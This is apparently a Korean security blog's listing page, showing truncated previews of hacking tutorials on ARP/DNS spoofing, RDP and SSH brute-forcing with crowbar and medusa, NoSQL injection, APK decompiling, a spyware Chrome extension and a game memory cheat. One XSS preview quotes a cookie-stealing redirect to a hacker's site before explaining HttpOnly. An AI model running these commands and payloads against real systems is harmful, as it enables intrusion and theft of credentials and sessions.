๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

๐Ÿ”’์ •๋ณด๋ณด์•ˆ122

๋„คํŠธ์›Œํฌ ํ•ดํ‚น - ettercap์˜ arp ์Šคํ‘ธํ•‘์„ ์ด์šฉํ•ด dns ์Šคํ‘ธํ•‘ํ•˜๊ธฐ ์šฐ์„  ettercap ์ผ ๋‹ค. ๊ทธ๋ฆฌ๊ณ  eth0์— ์ ‘๊ทผ ์ธํ„ฐํŽ˜์ด์Šค ์ƒ๋‹จ์— ๋ณด๋ฉด ๋‹๋ณด๊ธฐ ๋ชจ์–‘์ด ์žˆ๋Š”๋ฐ ์ด๋ฅผ ํด๋ฆญํ•ด ์ฃผ๋ณ€์— ์กด์žฌํ•˜๋Š” ํ˜ธ์ŠคํŠธ๋“ค์„ ์žก๋Š”๋‹ค. ๊ทธ๋ฆฌ๊ณ  ํ™•์ธ๋œ ์•„์ดํ”ผ ์–ด๋“œ๋ ˆ์Šค๋“ค ์ค‘ ๋ผ์šฐํ„ฐ(๊ณต์œ ๊ธฐ)๋กœ ์ถ”์ •๋˜๋Š” ๊ฒƒ์€ Target 1์œผ๋กœ ์ง€์ •ํ•˜๊ณ , ์Šค๋‹ˆํ•‘(๋„์ฒญ)์„ ๋‹นํ•˜๊ณ ์žํ•˜๋Š” ํƒ€๊ฒŸ์€ Target 2๋กœ ์ง€์ • ์ด์ œ ๋‹ค์‹œ ์ธํ„ฐํŽ˜์ด์Šค์— ์ƒ๋‹จ ๋งจ ์˜ค๋ฅธ์ชฝ์— ์ง€๊ตฌ๋ณธ ๋ชจ์–‘์ด ์žˆ๋Š”๋ฐ ์ด๋ฅผ ํด๋ฆญํ•ด์„œ ARP poising...์„ ๋ˆ„๋ฅธ ๋‹ค์Œ ์ด๋Ÿฐ ์ฒดํฌ ๋ฐ•์Šค ์ฐฝ์ด ๋œจ๊ฒŒ๋˜๋ฉด ์‚ฌ์ง„๊ณผ ๊ฐ™์ด "Sniff remote connections."๋ฅผ ์ฒดํฌํ•˜๊ณ  OK๋ฅผ ๋ˆŒ๋Ÿฌ ARP ์Šคํ‘ธํ•‘์„ ์‹œ์ž‘ํ•œ๋‹ค. ์ด์ œ ํ”ผํ•ด์ž์˜ PC๋ฅผ ์กฐ์ž‘ํ•œ๋‹ค. cmd์— ๋“ค์–ด๊ฐ€์„œ "arp -a"๋ฅผ ์‹คํ–‰์‹œ์ผœ์ฃผ๊ฒŒ ๋˜๋ฉด (ARP ํ…Œ์ด๋ธ” ํ™•์ธ ๋ช…๋ น์–ด) ๊ณต์œ ๊ธฐ์˜ ๋ฌผ๋ฆฌ์  ์ฃผ์†Œ๊ฐ€ ์•„๋ž˜์˜ ๋‹ค๋ฅธ.. 2021. 12. 22.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - Tor ProxyChains ๋กœ์ปฌ ํ”„๋ก์‹œ ์„ค์ • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663 How to Setup PROXYCHAINS in Kali-Linux by Terminal proxychains is open source software for Linux systems and comes pre-installed with Kali Linux, the tool redirects TCP connections through… medium.com [์„ค์น˜ ๋ฐ ์„ค์ •] # tor ์„ค์น˜ sudo apt install tor # proxychains ์„ค์ • ํŒŒ์ผ ์ˆ˜์ •ํ•˜๊ธฐ sudo vim /etc/proxychains.conf or sudo .. 2021. 12. 15.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - rdp ์‚ฌ์ „ ๊ณต๊ฒฉ ์žฌํƒ๊ทผ๋ฌด๊ฐ€ ์žฆ์•„์ง„ ์š”์ฆ˜ RDP(Remote Desktop Protocol)๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์œ ์ €๋“ค์ด ๊ฝค๋‚˜ ๋งŽ์•„์กŒ๋‹ค. ์ด๋Ÿฐ ์‹œ๋Œ€์˜ ํ๋ฆ„์„ ๋งž์ถฐ์„œ RDP๋ฅผ ๊ณต๊ฒฉํ•˜๋Š” ๋‹ค์–‘ํ•œ ๊ณต๊ฒฉ ๋„๊ตฌ๋“ค์ด ์ƒ๊ฒจ๋‚ฌ๋Š”๋ฐ, ๊ทธ์ค‘ ํ•˜๋‚˜๊ฐ€ ์‚ฌ์ „ ๊ณต๊ฒฉ์„ ๋„์™€์ฃผ๋Š” Crowbar๊ฐ€ ์žˆ๋‹ค. ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ธฐ ์ด์ „์— ๋ฆฌ๋ˆ…์Šค์— freerdp๊ฐ€ ์„ค์น˜๋˜์–ด์žˆ์–ด์•ผ ํ•จ sudo apt-get install -y nmap openvpn freerdp-x11 vncviewer [์‚ฌ์šฉ ๋ช…๋ น์–ด] ./crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456 ./crowbar.py -b rdp -s 192.168.2.250/32 -u localuser -C ~/Desktop/passlist hydra๋กœ๋„ ๊ฐ€๋Šฅํ•˜๋‹ค. [์‚ฌ์šฉ ๋ช….. 2021. 12. 14.
๋ชจ๋ฐ”์ผ ํ•ดํ‚น - class ํŒŒ์ผ์„ ๋””์ปดํŒŒ์ผํ•˜์—ฌ java ํŒŒ์ผ ๋งŒ๋“ค๊ธฐ ์ด์ „์— ์ ์€ ๊ธ€์— ์ด์–ด์„œ https://janger.tistory.com/146 ๋ชจ๋ฐ”์ผ ํ•ดํ‚น - DEX๋ฅผ jar๋กœ ์ถ”์ถœํ•˜์—ฌ class ํŒŒ์ผ๋“ค ํ™•์ธํ•˜๊ธฐ DEX๋ฅผ ๊ตฌํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” 7-zip์„ ์„ค์น˜ํ•ด์„œ APK๋ฅผ ์ถ”์ถœํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. https://www.7-zip.org/download.html Download Download .7z Any / x86 / x64 LZMA SDK: (C, C++, C#, Java) www.7-zip.org ๊ทธ ๋‹ค์Œ dex ํŒŒ์ผ์„.. janger.tistory.com ์ด๋ฒˆ์—” class ํŒŒ์ผ๋“ค์„ ์ด์šฉํ•ด java๋ฅผ ๋งŒ๋“ค๊ณ  ์‹ถ์„ ๊ฒฝ์šฐ ์šฐ์„ ์€ 7-zip์„ ์ด์šฉํ•ด์„œ APK๋ฅผ ์••์ถ• ํ•ด์ œํ•˜๊ณ , dex2jar ๋„๊ตฌ๋กœ classes-dex2jar.jar๋ฅผ ์ถ”์ถœํ•ด์ฃผ์—ˆ๋Š”๋ฐ ์ด๋ฒˆ์—๋„ ์ด classes-d.. 2021. 12. 11.
๋ชจ๋ฐ”์ผ ํ•ดํ‚น - DEX๋ฅผ jar๋กœ ์ถ”์ถœํ•˜์—ฌ class ํŒŒ์ผ๋“ค ํ™•์ธํ•˜๊ธฐ DEX๋ฅผ ๊ตฌํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” 7-zip์„ ์„ค์น˜ํ•ด์„œ APK๋ฅผ ์ถ”์ถœํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. https://www.7-zip.org/download.html Download Download .7z Any / x86 / x64 LZMA SDK: (C, C++, C#, Java) www.7-zip.org ๊ทธ ๋‹ค์Œ dex ํŒŒ์ผ์„ jar๋กœ ๋ณ€ํ™˜์‹œ์ผœ์ฃผ๋Š” dex2 jar๋ฅผ ์„ค์น˜๋ฐ›์Šต๋‹ˆ๋‹ค. https://github.com/pxb1988/dex2jar GitHub - pxb1988/dex2jar: Tools to work with android .dex and java .class files Tools to work with android .dex and java .class files - GitHub - pxb1988/dex2jar: .. 2021. 12. 11.
๋ชจ๋ฐ”์ผ ํ•ดํ‚น - ์•ˆ๋“œ๋กœ์ด๋“œ APK ์ถ”์ถœ ๋ฐ ๋ถ„์„ ์šฐ์„  APP์„ APK๋กœ ์ถ”์ถœํ•˜๋ ค๋ฉด ์ „์šฉ ์•ฑ์„ ์„ค์น˜ํ•ด์•ผ ํ•จ https://play.google.com/store/apps/details?id=com.ext.ui APK Extractor - Google Play ์•ฑ ์—ฌ๋Ÿฌ๋ถ„์˜ ๊ธฐ๊ธฐ์— ์„ค์น˜๋œ ์•ฑ์„ SD์นด๋“œ๋กœ ์ถ”์ถœํ•ฉ๋‹ˆ๋‹ค. play.google.com ๊ทธ๋ฆฌ๊ณ  APK๋ฅผ ์–ธํŒจํ‚ค์ง• ํ•ด์ฃผ๋Š” ๋„๊ตฌ์ธ apktool๋ฅผ ์„ค์น˜ํ•œ๋‹ค. https://ibotpeaches.github.io/Apktool/ Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps. A tool for reverse engineering 3rd party, closed, binary Android apps. It can.. 2021. 12. 11.
์›น ํ•ดํ‚น - ์›น ํŒจํ‚ท ์ „์†ก ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ https://chrome.google.com/webstore/detail/talend-api-tester-free-ed/aejoelaoggembcahagimdiliamlcdmfm Talend API Tester - Free Edition Visually interact with REST, SOAP and HTTP APIs. chrome.google.com ์›น ์„œ๋ฒ„ API๋ฅผ ํ…Œ์ŠคํŠธํ•  ๋•Œ ๋„์›€์ด ๋˜๋Š” ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ์ž…๋‹ˆ๋‹ค. ์ด์ „๊นŒ์ง€๋Š” POSTMAN์„ ์ฃผ๋กœ ์‚ฌ์šฉํ–ˆ๋Š”๋ฐ ์ด ๋…€์„์€ ๋ธŒ๋ผ์šฐ์ €์—์„œ ์กฐ์ž‘์ด ๊ฐ€๋Šฅํ•˜๋ฉฐ, ์‹ฌ์ง€์–ด ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ์ฟ ํ‚ค ๊ฐ’๋„ ํ•จ๊ป˜ ์ „๋‹ฌ์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ํŽ˜์ด์ง€์— ๋กœ๊ทธ์ธ์ด ํ•„์š”ํ•œ ๊ฒฝ์šฐ์— ์•„์ฃผ ํŽธ๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  ์ž‘์„ฑํ•œ ์š”์ฒญ ์ •๋ณด๋“ค์„ ๋ธŒ๋ผ์šฐ์ €์— ์ €์žฅ๋„ ํ•  ์ˆ˜ ์žˆ์Œ. ๋‹จ์ : ์‹œํฌ๋ฆฟ ๋ชจ๋“œ์—์„œ ์‚ฌ์šฉ.. 2021. 12. 9.
์›น ํ•ดํ‚น - NoSQL Injection ์กฐ๊ฑด ํ‘œํ˜„์‹ https://book.hacktricks.xyz/pentesting-web/nosql-injection NoSQL injection - HackTricks Brute-force login usernames and passwords from POST login book.hacktricks.xyz [$ne] : ๊ฐ™์ง€ ์•Š์„ ๊ฒฝ์šฐ(not equals) [$regex] : ์ •๊ทœํ‘œํ˜„์‹ [$eq] : ๊ฐ™๋‹ค(=) [$lt] : ์ž‘๋‹ค() [$lte] : ์ž‘๊ฑฐ๋‚˜ ๊ฐ™๋‹ค() $regex๋กœ ํŒจ์Šค์›Œ๋“œ ๊ธธ์ด ์•Œ์•„๋‚ด๊ธฐ "password": {"$regex":".{1}"} => admin "password": {"$regex":".{2}"} => admin ... "password": {"$regex":".{5}"} => admin.. 2021. 12. 9.
์›น ํ•ดํ‚น - ํฌ๋กฌ ์ŠคํŒŒ์ด์›จ์–ด ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ , Bad Extension ํฌ๋กฌ ํ™•์žฅ์ž๋ฅผ ์ด์šฉํ•ด ๋ธŒ๋ผ์šฐ์ € ์ „์šฉ ์ŠคํŒŒ์ด์›จ์–ด๋ฅผ ๋งŒ๋“ค์–ด๋ณด์•˜์Šต๋‹ˆ๋‹ค. ์šฐ์„  ๋Œ€์ƒ์˜ ์ปดํ“จํ„ฐ์— ์„ค์น˜๋ฅผ ํ•˜๋Š” ๊ฑด ์ƒ์ƒ์— ๋งก๊ธฐ๊ณ , ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ์„ ์„ค์น˜ํ•˜๊ฒŒ ๋˜๋ฉด ๋ณ„ ๋‹ค๋ฅธ ์ด์ƒ ์ฆ์ƒ์€ ์—†์Šต๋‹ˆ๋‹ค. ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ ์•„์ด์ฝ˜์„ ํด๋ฆญํ•ด๋„ ๋ณ„ ๋‹ค๋ฅธ ๊ธฐ๋Šฅ์€ ์—†์Šต๋‹ˆ๋‹ค. ํ•˜์ง€๋งŒ ๋งŒ์•ฝ ์œ ์ €๊ฐ€ ๋‹ค๋ฅธ ํŽ˜์ด์ง€๋กœ ์ด๋™์„ ํ•  ๊ฒฝ์šฐ๊ฐ€ ์ƒ๊ธฐ๋ฉด ๊ณต๊ฒฉ์ž์˜ PC์—๋Š” ์œ ์ €๊ฐ€ ๋Œ์•„๋‹ค๋‹Œ ํŽ˜์ด์ง€์˜ html ํŒŒ์ผ๊ณผ ์Šคํฌ๋ฆฐ์ƒท ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œ ๋ฐ›๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์›๋ฆฌ: ๊ณต๊ฒฉ์ž๊ฐ€ ํŒŒ์ด์ฌ Flask๋กœ CDN(์ฝ˜ํ…์ธ  ์ „์†ก ๋„คํŠธ์›Œํฌ) ์„œ๋ฒ„๋ฅผ ์—ด๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด ์•…์„ฑ ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ์€ ํŽ˜์ด์ง€๋ฅผ ์ด๋™ํ•  ๋•Œ๋งˆ๋‹ค ๊ณต๊ฒฉ์ž์—๊ฒŒ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ฝ˜ํ…์ธ  ํŒŒ์ผ์„ ์š”๊ตฌ๋ฅผ ํ•˜๊ฒŒ ๋˜๊ณ , ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋Š” ์ฝ˜ํ…์ธ ๋ฅผ ์ œ๊ณต์„ ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ๊ทธ ์ œ๊ณต๋ฐ›๋Š” ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ํŒŒ์ผ์—๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์ „์†กํ•˜๋Š” ajax ์Šคํฌ๋ฆฝํŠธ์™€ ๋ฌธ์„œ.. 2021. 12. 8.
๊ฒŒ์ž„ ํ•ดํ‚น - ํ”ผ์นด์ธ„ ๋ฐฐ๊ตฌ ํ•ต(C) #include #include int make_envincible(HANDLE hProcess) { // ์ ์ˆ˜ ๋ชฐ๋นต LPVOID base = (LPVOID)0x00403C4A; BYTE buffer[4] = {0xFF, 0x46, 0x40, 0x90}; // 1P: 0xFF, 0x46, 0x3C, 0x90 | 2P: 0xFF, 0x46, 0x40, 0x90 BOOL is_successed = WriteProcessMemory(hProcess, base, buffer, 4, NULL); // ์—”๋“œ๋ฆฌ์Šค ๊ฒŒ์ž„ base = (LPVOID)0x00403C27; BYTE buffer2[2] = {0x74, 0x76}; is_successed = WriteProcessMemory(hProcess, base, buf.. 2021. 12. 3.
์›น ํ•ดํ‚น - XSS ๊ณต๊ฒฉ์œผ๋กœ document.cookie ์ •๋ณด ๊ฐ€์ ธ์˜ค๊ธฐ ๋ฐฉ์ง€(HttpOnly) ํ•ด์ปค๋Š” ์•„๋ž˜์ฒ˜๋Ÿผ document.cookie๋ฅผ ํ†ตํ•ด ์ค‘์š”ํ•œ ์ฟ ํ‚ค ์ •๋ณด๋“ค์„ ์ˆ˜์ง‘ํ•˜๋Š” ๊ฒŒ ์ผ๋ฐ˜์  location.href = 'http://ํ•ด์ปค์‚ฌ์ดํŠธ/?cookies=' + document.cookie; ์„œ๋ฒ„๊ฐ€ ํด๋ผ์ด์–ธํŠธ์—๊ฒŒ ์ฟ ํ‚ค ๊ฐ’์„ ์ง€์ •ํ•  ๋•Œ์— HttpOnly๋ผ๋Š” ์˜ต์…˜์„ ์ถ”๊ฐ€์‹œ์ผœ์ฃผ๋ฉด, (HttpOnly๊ฐ€ Http๋งŒ ํ—ˆ์šฉํ•˜๊ณ , Https๋Š” ํ—ˆ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค ์ด๊ฒŒ ์•„๋‹ˆ๋‹ค..) ํด๋ผ์ด์–ธํŠธ๊ฐ€ document.cookie๋ฅผ ์•„๋ฌด๋ฆฌ ์ถœ๋ ฅํ•ด ๋ณด์•„๋„ ํ•ด๋‹น ์ฟ ํ‚ค์— ๋Œ€ํ•œ ์ •๋ณด๋Š” ์ถœ๋ ฅ์ด ๋˜์ง€ ์•Š๋Š”๋‹ค. Set-Cookie: ์ฟ ํ‚ค๋ช…=์ฟ ํ‚ค๊ฐ’; path=/; HttpOnly HttpOnly ์„ค์ •์„ ํ•œ ์ฟ ํ‚ค๋Š” ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ ‘๊ทผ์„ ํ•  ์ˆ˜ ์—†๋„๋ก ๋˜๋ฒ„๋ฆฐ ๊ฒƒ. ๋‹น์—ฐํžˆ ์„œ๋ฒ„์—๊ฒŒ GET, POST ์š”์ฒญ๋“ฑ์„ ํ•  ๋•Œ์—๋Š” HttpOnly ์„ค์ •๋œ ์ฟ ํ‚ค.. 2021. 11. 25.
๋„คํŠธ์›Œํฌ ํ•ดํ‚น - medua, ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ ๋„๊ตฌ https://www.kali.org/tools/medusa/ medusa | Kali Linux Tools www.kali.org ์–˜๋„ hydra๊ณผ ๊ฐ™์€ ๋Œ€์ž… ๊ณต๊ฒฉ ๋„๊ตฌ์ด๋‹ค. ์‚ฌ์šฉ ๋ฐฉ๋ฒ•) medusa -h ํ˜ธ์ŠคํŠธ -u ์œ ์ € -P ์‚ฌ์ „(passwords.txt) -M ๋ชจ๋“œ(ssh|ftp) ssh ์„œ๋ฒ„๋ฅผ ๋Œ€์ƒ์œผ๋กœ ์จ๋ดค๋Š”๋ฐ ์ž˜ ๋œ๋‹ค. example) medusa -h 192.168.0.5 -u root -p qwer1234 -M ssh medusa -h 192.168.0.5 -u root -P passwords.txt -M ftp 2021. 11. 22.
728x90